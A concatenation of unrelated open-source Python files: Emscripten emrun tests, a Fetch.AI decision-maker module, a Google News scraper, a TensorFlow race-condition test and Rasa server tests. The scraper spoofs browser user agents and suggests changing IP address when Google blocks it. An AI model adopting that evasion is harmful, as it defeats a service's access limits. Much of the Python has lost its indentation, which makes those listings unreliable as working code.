args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as its startup directory, and the browser will
# not close as part of the test. That pins down the cwd on Windows and would make it impossible
# to delete the directory. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
base.py
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the decision maker class."""
import hashlib
import threading
from abc import ABC, abstractmethod
from queue import Queue
from threading import Thread
from types import SimpleNamespace
from typing import Any, Dict, List, Optional
from uuid import uuid4
from aea.crypto.wallet import Wallet
from aea.helpers.async_friendly_queue import AsyncFriendlyQueue
from aea.helpers.logging import WithLogger, get_logger
from aea.helpers.transaction.base import Terms
from aea.identity.base import Identity
from aea.protocols.base import Message
def _hash(access_code: str) -> str:
"""
Get the hash of the access code.
:param access_code: the access code
:return: the hash
"""
result = hashlib.sha224(access_code.encode("utf-8")).hexdigest()
return result
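# For reference: _hash returns the 56-character hexadecimal SHA-224 digest of the
# UTF-8 encoded access code, i.e. _hash("secret") == hashlib.sha224(b"secret").hexdigest().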
class OwnershipState(ABC):
"""Represent the ownership state of an agent (can proxy a ledger)."""
@abstractmethod
def set(self, **kwargs: Any) -> None:
"""
Set values on the ownership state.
:param kwargs: the relevant keyword arguments
"""
@abstractmethod
def apply_delta(self, **kwargs: Any) -> None:
"""
Apply a state update to the ownership state.
This method is used to apply a raw state update without a transaction.
:param kwargs: the relevant keyword arguments
"""
@property
@abstractmethod
def is_initialized(self) -> bool:
"""Get the initialization status."""
@abstractmethod
def is_affordable_transaction(self, terms: Terms) -> bool:
"""
Check if the transaction is affordable (and consistent).
:param terms: the transaction terms
:return: True if the transaction is legal with respect to the current state, False otherwise.
"""
@abstractmethod
def apply_transactions(self, list_of_terms: List[Terms]) -> "OwnershipState":
"""
Apply a list of transactions to (a copy of) the current state.
:param list_of_terms: the sequence of transaction terms.
:return: the final state.
"""
@abstractmethod
def __copy__(self) -> "OwnershipState":
"""Copy the object."""
class Preferences(ABC):
"""Class to represent the preferences."""
@abstractmethod
def set(self, **kwargs: Any) -> None:
"""
Set values on the preferences.
:param kwargs: the relevant keyword arguments
"""
@property
@abstractmethod
def is_initialized(self) -> bool:
"""
Get the initialization status.
Returns True if exchange_params_by_currency_id and utility_params_by_good_id are not None.
"""
@abstractmethod
def marginal_utility(self, ownership_state: OwnershipState, **kwargs: Any) -> float:
"""
Compute the marginal utility.
:param ownership_state: the ownership state against which to compute the marginal utility.
:param kwargs: optional keyword arguments
:return: the marginal utility score
"""
@abstractmethod
def utility_diff_from_transaction(
self, ownership_state: OwnershipState, terms: Terms
) -> float:
"""
Simulate a transaction and get the resulting utility difference (taking into account the fee).
:param ownership_state: the ownership state against which to apply the transaction.
:param terms: the transaction terms.
:return: the score.
"""
@abstractmethod
def __copy__(self) -> "Preferences":
"""Copy the object."""
class ProtectedQueue(Queue):
"""A wrapper of a queue to protect which object can read from it."""
def __init__(self, access_code: str) -> None:
"""
Initialize the protected queue.
:param access_code: the access code to read from the queue
"""
super().__init__()
self._access_code_hash = _hash(access_code)
def put( # pylint: disable=arguments-differ
self,
internal_message: Optional[Message],
block: bool = True,
timeout: Optional[float] = None,
) -> None:
"""
Put an internal message on the queue.
If optional args block is true and timeout is None (the default),
block if necessary until a free slot is available. If timeout is
a positive number, it blocks at most timeout seconds and raises
the Full exception if no free slot was available within that time.
Otherwise (block is false), put an item on the queue if a free slot
is immediately available, else raise the Full exception (timeout is
ignored in that case).
:param internal_message: the internal message to put on the queue
:param block: whether to block or not
:param timeout: timeout on block
:raises: ValueError, if the item is not an internal message
"""
if not (isinstance(internal_message, Message) or internal_message is None):
raise ValueError("Only messages are allowed!")
        super().put(internal_message, block=block, timeout=timeout)
def put_nowait( # pylint: disable=arguments-differ
self, internal_message: Optional[Message]
) -> None:
"""
Put an internal message on the queue.
Equivalent to put(item, False).
:param internal_message: the internal message to put on the queue
:raises: ValueError, if the item is not an internal message
"""
if not (isinstance(internal_message, Message) or internal_message is None):
raise ValueError("Only messages are allowed!")
super().put_nowait(internal_message)
def get(self, block: bool = True, timeout: Optional[float] = None) -> None:
"""
Inaccessible get method.
:param block: whether to block or not
:param timeout: timeout on block
:raises: ValueError, access not permitted.
"""
raise ValueError("Access not permitted!")
def get_nowait(self) -> None:
"""
Inaccessible get_nowait method.
:raises: ValueError, access not permitted.
"""
raise ValueError("Access not permitted!")
def protected_get(
self, access_code: str, block: bool = True, timeout: Optional[float] = None
) -> Optional[Message]:
"""
Access protected get method.
:param access_code: the access code
:param block: If optional args block is true and timeout is None (the default), block if necessary until an item is available.
:param timeout: If timeout is a positive number, it blocks at most timeout seconds and raises the Empty exception if no item was available within that time.
:raises: ValueError, if caller is not permitted
:return: internal message
"""
if self._access_code_hash != _hash(access_code):
raise ValueError("Wrong code, access not permitted!")
internal_message = super().get(
block=block, timeout=timeout
) # type: Optional[Message]
return internal_message
class DecisionMakerHandler(WithLogger, ABC):
"""This class implements the decision maker."""
__slots__ = ("_identity", "_wallet", "_config", "_context", "_message_out_queue")
self_address: str = "decision_maker"
def __init__(
self, identity: Identity, wallet: Wallet, config: Dict[str, Any], **kwargs: Any
) -> None:
"""
Initialize the decision maker handler.
:param identity: the identity
:param wallet: the wallet
:param config: the user defined configuration of the handler
        :param kwargs: the keyword arguments
"""
logger = get_logger(__name__, identity.name)
WithLogger.__init__(self, logger=logger)
self._identity = identity
self._wallet = wallet
self._config = config
self._context = SimpleNamespace(**kwargs)
self._message_out_queue = AsyncFriendlyQueue() # type: AsyncFriendlyQueue
@property
def agent_name(self) -> str:
"""Get the agent name."""
return self.identity.name
@property
def identity(self) -> Identity:
"""Get identity of the agent."""
return self._identity
@property
def wallet(self) -> Wallet:
"""Get wallet of the agent."""
return self._wallet
@property
def config(self) -> Dict[str, Any]:
"""Get user defined configuration"""
return self._config
@property
def context(self) -> SimpleNamespace:
"""Get the context."""
return self._context
@property
def message_out_queue(self) -> AsyncFriendlyQueue:
"""Get (out) queue."""
return self._message_out_queue
@abstractmethod
def handle(self, message: Message) -> None:
"""
Handle an internal message from the skills.
:param message: the internal message
"""
class DecisionMaker(WithLogger):
"""This class implements the decision maker."""
__slots__ = (
"_queue_access_code",
"_message_in_queue",
"_decision_maker_handler",
"_thread",
"_lock",
"_message_out_queue",
"_stopped",
)
    def __init__(self, decision_maker_handler: DecisionMakerHandler) -> None:
"""
Initialize the decision maker.
:param decision_maker_handler: the decision maker handler
"""
WithLogger.__init__(self, logger=decision_maker_handler.logger)
self._queue_access_code = uuid4().hex
self._message_in_queue = ProtectedQueue(
self._queue_access_code
) # type: ProtectedQueue
self._decision_maker_handler = decision_maker_handler
self._thread = None # type: Optional[Thread]
self._lock = threading.Lock()
self._message_out_queue = decision_maker_handler.message_out_queue
self._stopped = True
@property
def agent_name(self) -> str:
"""Get the agent name."""
return self.decision_maker_handler.identity.name
@property
def message_in_queue(self) -> ProtectedQueue:
"""Get (in) queue."""
return self._message_in_queue
@property
def message_out_queue(self) -> AsyncFriendlyQueue:
"""Get (out) queue."""
return self._message_out_queue
@property
def decision_maker_handler(self) -> DecisionMakerHandler:
"""Get the decision maker handler."""
return self._decision_maker_handler
def start(self) -> None:
"""Start the decision maker."""
with self._lock:
if not self._stopped: # pragma: no cover
self.logger.debug(
"[{}]: Decision maker already started.".format(self.agent_name)
)
return
self._stopped = False
self._thread = Thread(target=self.execute, name=self.__class__.__name__)
self._thread.start()
def stop(self) -> None:
"""Stop the decision maker."""
with self._lock:
self._stopped = True
self.message_in_queue.put(None)
if self._thread is not None:
self._thread.join()
self.logger.debug("[{}]: Decision Maker stopped.".format(self.agent_name))
self._thread = None
def execute(self) -> None:
"""
Execute the decision maker.
Performs the following while not stopped:
- gets internal messages from the in queue and calls handle() on them
"""
while not self._stopped:
message = self.message_in_queue.protected_get(
self._queue_access_code, block=True
) # type: Optional[Message]
if message is None:
self.logger.debug(
"[{}]: Received empty message. Quitting the processing loop...".format(
self.agent_name
)
)
continue
self.handle(message)
def handle(self, message: Message) -> None:
"""
Handle an internal message from the skills.
:param message: the internal message
"""
self.decision_maker_handler.handle(message)
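# --- Usage sketch (illustrative, not part of the module) ---------------------
# A minimal sketch of how the classes above are typically wired together,
# assuming a concrete DecisionMakerHandler subclass (`MyHandler` is a
# hypothetical name) that implements `handle`, and pre-built `identity` and
# `wallet` objects:
#
#     handler = MyHandler(identity=identity, wallet=wallet, config={})
#     decision_maker = DecisionMaker(handler)
#     decision_maker.start()
#     decision_maker.message_in_queue.put(message)        # skills enqueue requests
#     response = decision_maker.message_out_queue.get()   # skills read responses
#     decision_maker.stop()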
|
core.py
|
from __future__ import print_function
import errno
import logging
import os
import pickle
import random
import re
import time
import requests
from bs4 import BeautifulSoup
import json
from fake_useragent import UserAgent
from newspaper import Article
import threading
from datetime import datetime, timedelta
from dateutil import parser
from queue import Queue
from urllib.parse import quote
import urllib.request
from unidecode import unidecode
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT = 0
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbs=cdr%3A1%2Ccd_min%3A{}%2Ccd_max%3A{}&tbm=nws&start={}'
logging.basicConfig(
level = logging.DEBUG, format = '%(asctime)s - %(levelname)s - %(message)s'
)
def get_date(load):
    try:
        date = re.findall(
            r'[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?', load
        )
        return '%s-%s-%s' % (date[2], date[0], date[1])
    except Exception:
        return False
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [
threading.Thread(target = task_wrapper, args = args)
for args in args_list
]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def forge_url(q, start, year_start, year_end):
global NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT += 1
return GOOGLE_NEWS_URL.format(
q.replace(' ', '+'), str(year_start), str(year_end), start
)
def extract_links(content):
soup = BeautifulSoup(content, 'html.parser') # _sQb top _vQb _mnc
today = datetime.now().strftime('%m/%d/%Y')
links_list = [
v.attrs['href'] for v in soup.find_all('a', {'class': ['lLrAF']})
]
dates_list = [v.text for v in soup.find_all('div', {'class': ['slp']})]
print(dates_list)
output = []
for (link, date) in zip(links_list, dates_list):
try:
date = date.split('-')
if (
date[1].find('hour') >= 0
or date[1].find('minute') >= 0
or date[1].find('分鐘') >= 0
or date[1].find('小時') >= 0
):
date[1] = today
            elif date[1].find('day') >= 0 or date[1].find('日') >= 0:
                count = date[1].split(' ')[0]
                date[1] = (datetime.now() - timedelta(days = int(count))).strftime('%m/%d/%Y')
            else:
                try:
                    date[1] = parser.parse(date[1]).strftime('%m-%d-%Y')
                except Exception:
                    date[1] = 'null'
            output.append((link, date[0].strip(), date[1]))
        except Exception:
            continue
return output
def get_article(link, news, date):
article = Article(link)
article.download()
article.parse()
article.nlp()
lang = 'eng'
if len(article.title) < 5 or len(article.text) < 5:
print('found BM/ID article')
article = Article(link, language = 'id')
article.download()
article.parse()
article.nlp()
lang = 'id'
return {
'title': article.title,
'url': link,
'authors': article.authors,
'top-image': article.top_image,
'text': article.text,
'keyword': article.keywords,
'summary': article.summary,
'news': news,
'date': date,
'language': lang,
}
def google_news_run(
keyword,
limit = 10,
year_start = 2010,
year_end = 2011,
debug = True,
sleep_time_every_ten_articles = 0,
):
num_articles_index = 0
ua = UserAgent()
results = []
while num_articles_index < limit:
url = forge_url(keyword, num_articles_index, year_start, year_end)
if debug:
logging.debug('For Google -> {}'.format(url))
logging.debug(
'Total number of calls to Google = {}'.format(
NUMBER_OF_CALLS_TO_GOOGLE_NEWS_ENDPOINT
)
)
headers = {'User-Agent': ua.chrome}
success = False
try:
response = requests.get(url, headers = headers, timeout = 60)
if (
str(response.content).find(
'In the meantime, solving the above CAPTCHA will let you continue to use our services'
)
>= 0
):
print('whops, blocked')
return results
links = extract_links(response.content)
nb_links = len(links)
if nb_links == 0 and num_articles_index == 0:
print(
                    'No results fetched. Either the keyword is wrong or you have been banned from Google. Retry tomorrow or change your IP address.'
)
return results
if nb_links == 0:
print('No more news to read for keyword {}.'.format(keyword))
return results
results += run_parallel_in_threads(get_article, links)
success = True
except requests.exceptions.Timeout:
logging.debug(
'Google news TimeOut. Maybe the connection is too slow. Skipping.'
)
continue
num_articles_index += 10
if debug and sleep_time_every_ten_articles != 0:
logging.debug(
'Program is going to sleep for {} seconds.'.format(
sleep_time_every_ten_articles
)
)
time.sleep(sleep_time_every_ten_articles)
return results
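# --- Usage sketch (illustrative only) -----------------------------------------
# A minimal example of how google_news_run might be called and its results
# persisted; the keyword and output filename below are hypothetical:
#
#     if __name__ == '__main__':
#         articles = google_news_run(
#             'python', limit = 20, year_start = 2018, year_end = 2019,
#             sleep_time_every_ten_articles = 5,
#         )
#         with open('articles.json', 'w') as fopen:
#             json.dump(articles, fopen)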
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
  # NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
variables.global_variables_initializer().run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
variables.global_variables_initializer().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
p.initializer.run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
p.initializer.run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
test_server.py
|
import os
from multiprocessing.managers import DictProxy
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, "name": "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
from pathlib import Path
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> Text:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return fake_model_path
def run_server() -> NoReturn:
import rasa
rasa.train = mocked_training_function
from rasa import __main__
import sys
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server)
yield server
server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
payload["force"] = True
response = requests.post("http://localhost:5005/model/train", json=payload)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return requests.get("http://localhost:5005/status").status_code == 200
except Exception:
return False
# wait until server is up before sending train request and status test loop
while not is_server_ready():
time.sleep(1)
training_request.start()
# Wait until the blocking training function was called
while shared_statuses.get("started_training") is not True:
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
while shared_statuses.get("training_result") is None:
time.sleep(1)
# Check that the training worked correctly
assert shared_statuses["training_result"] == 200
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app,
default_domain_path,
default_stories_file,
default_stack_config,
default_nlu_data,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app, default_stack_config, default_nlu_data, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(), config=config_file.read(), nlu=nlu_file.read()
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
